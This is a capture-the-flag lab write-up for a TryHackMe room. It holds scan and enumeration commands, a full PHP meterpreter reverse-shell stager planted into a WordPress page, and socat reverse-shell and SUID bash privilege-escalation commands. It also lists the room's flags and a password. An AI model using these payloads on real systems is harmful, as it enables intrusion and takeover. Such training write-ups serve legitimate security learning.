# TryHackMe All in One Room
* https://tryhackme.com/room/allinonemj

## Loot
* Flags (all base64 encoded)
    1. `/home/elyana/user.txt` : `VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259` : `THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}`
    2. `/root/root.txt` : `VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9` : `THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}`
    3. `/root/flag1.txt` : `VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259` : `THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}`
* Credentials
    * Wordpress : `elyana:H@ckme@123`

## Interesting
* 21/tcp : vsftpd 3.0.3
    * Anonymous Login Allowed
* 22/tcp : OpenSSH 7.6p1 Ubuntu
* 80/tcp : Apache httpd 2.4.29
    * /wordpress            => WordPress version 5.5.1
    * /hackathons           => Page with few clues
    * /wordpress/wp-content
    * /wordpress/wp-admin       => Login Page
    * /wordpress/wp-includes
    * Plugins : 
        * mail-masta : version 1.0
        * reflex-gallery : version 3.1.7
* `Linyx elyana 4.15.0-118-generic`
* `/var/backups/script.sh` -> runs as root

## Discovery and Port Scanning
* `nmap -sV -sC 10.10.70.72`
* `nmap -sV -sC -p- 10.10.11.98`

## Web Discovery
* `gobuster dir -u http://10.10.11.98 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt`
* `gobuster dir -u http://10.10.11.98/wordpress -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt`
* Found this : ?? `var ajaxurl = 'http://10.10.11.98/wordpress/wp-admin/admin-ajax.php';`
* `wpscan --url http://10.10.11.98/wordpress`
    * XML-RPC seems to be enabled: http://10.10.11.98/wordpress/xmlrpc.php
    * WordPress readme found: http://10.10.11.98/wordpress/readme.html
    * Upload directory has listing enabled: http://10.10.11.98/wordpress/wp-content/uploads/
    * The external WP-Cron seems to be enabled: http://10.10.11.98/wordpress/wp-cron.php
    * WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
* Nothing found in the directories found
* `gobuster dir -u http://10.10.11.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
* `gobuster dir -u http://10.10.11.98/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
* `gobuster dir -u http://10.10.11.98/hackathons -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
* Found a cipher. Decoded it with vigenere-cipher to get a password

## FTP Anonymous Login
* `ftp`, `open 10.10.11.98`, `anonymous`, `anonymous`
* Works but nothing in the directory

## Wordpress Exploitation
* Setup listener in Metasploit for `php/meterpreter/reverse_tcp`
* Create PHP exploit : `msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.11.98 LPORT=4444 -f raw -o shell.php`
* Replace some page code with the exploit : 
```
<?php  error_reporting(0); $ip = '10.6.28.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
```
* Go to the page
* Works!
* `getuid` : `www-data`

## PrivEsc
* Started a Metasploit generic listener
* `/var/backups/script.sh` -> runs as root with a cron job
* `echo 'cat /home/elyana/user.txt > /tmp/flag1.txt' > script.sh`, then `touch /tmp/flag1.txt`
* `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null`
    * `/usr/bin/socat`
    * `/usr/bin/lxc`
    * `/bin/bash`
    * `/bin/chmod`
* Setup socat listener : `socat file:`tty`,raw,echo=0 tcp-listen:12345`
* Run socat SUID : `/usr/bin/socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane` -> gets us a www-dat shell ..
* `bash -p` -> WORKS
* `id` : `id=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)`
* We have root privs and can read anything



